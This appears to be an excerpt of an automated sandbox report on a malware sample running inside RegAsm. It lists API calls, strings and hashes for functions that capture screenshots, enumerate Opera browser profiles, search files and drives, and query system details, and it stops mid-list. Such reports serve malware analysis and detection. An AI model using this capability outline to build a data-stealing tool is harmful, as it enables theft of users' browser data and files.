                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                  • API String ID: 1611285705-2016369993
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75a545c076d1dd2e0cda86b1f31a52cb2c57117cf048d23ae71c1147ee9a352d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74515C71A01229BBCB20DF95DC45EFFBB78EF49B11F00421AF605A2290D6789A41CBE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411D10 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 211windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00411DCA
                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411DD7
                                                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00411DDE
                                                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411DE7
                                                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DF8
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00411E03
                                                                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411E23
                                                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(000000FF), ref: 00411E9D
                                                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(000000FF), ref: 00411EAA
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00411F29
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00411F47
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00411F4E
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00411F56
                                                                                                                                                                                                                                                                                                  • CloseWindow.USER32(00000000), ref: 00411F5D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                                                                                                                  • API String ID: 1311022706-3785015651
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 955233e89dab8965993365ce23471f417d3a05ebbc493c96f06fa7f3e3f93d87
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A716CB5900218AFDB10DFE4DD45BEEBBB9EF49704F10412EFA05A3291D7386A05CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00416CF0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 155stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416D2B
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00416D42
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 111849568-634091350
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2cb9bfa35f18a05ea18699b2ebf9ea07bfb25382f6a54c62d3d11893d13825a0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D751F4B5800218ABDB14EBA0CC85FEE777DAB48310F00469EFA15A3191D778A748CBE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040B030 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 658fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00426ABB,?,?,00000000), ref: 0040B0C2
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CF8,?,00000000), ref: 0040B13C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CFC,?,00000000), ref: 0040B156
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,00426ACA,00426AC7,00426AC6,00426AC3,00426AC2,00426ABF,00426ABE,?,00000000), ref: 0040B1EB
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B203
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B21B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                                                  • Instruction ID: efbda9057b4a3320160d0838e4bb094c7ba51aae6ab1d3ada1da399397eb047e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31528030901248EACB15EBA5C955BDDBBB99F19304F5040BEE505732D2DBB82B4CCBB6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004011E0 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 801fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,004020FB,?,00423330,?,00000000,00000000,?,00000000), ref: 00401446
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004014BC
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 004014D6
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,004020FB,?,00423340,?,00000000), ref: 00401603
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 004018D7
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 004018E6
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401C34
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000), ref: 00401C43
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %$L3B$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2707319931-1614187093
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f0ecdccfbf971c4eb3ba04f5591d09edb7ba5691986d76eb2288118b31a76ee
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5726B70801248EADB15EBA5C951BDDBBB85F19308F5440BEE605732D2DF782B4CCB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004168E0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416959
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041697E
                                                                                                                                                                                                                                                                                                  • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416987
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169A6
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169C4
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169E7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00416A4E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                  • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                                                                                  • Opcode ID: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ef20b39a4741f89efdf50063d3a739dc061204c8983723d5aff4085e6fe27b5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A961D3B1500244ABDB30EF61DC45FEE3B79AF05704F50815EF90963292DF78AA89CB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040A530 Relevance: 13.8, APIs: 9, Instructions: 329fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00426AAF,00000000,?,00426CB0,?,?,00426AAF,?,00000004), ref: 0040A5C1
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CB4), ref: 0040A5FD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CB8), ref: 0040A617
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,01571F38,00000000,?,?,?,00426CBC,?,?,00426AB2), ref: 0040A6AC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37905d91ebad19cbda5eda32a3e59e51b24659bb580c75c62476da3a2a5a7917
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDD18071901248EACB14EBB5C9466DDBBB9AF19344F10817EE901732D2DB785B0CCBE6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
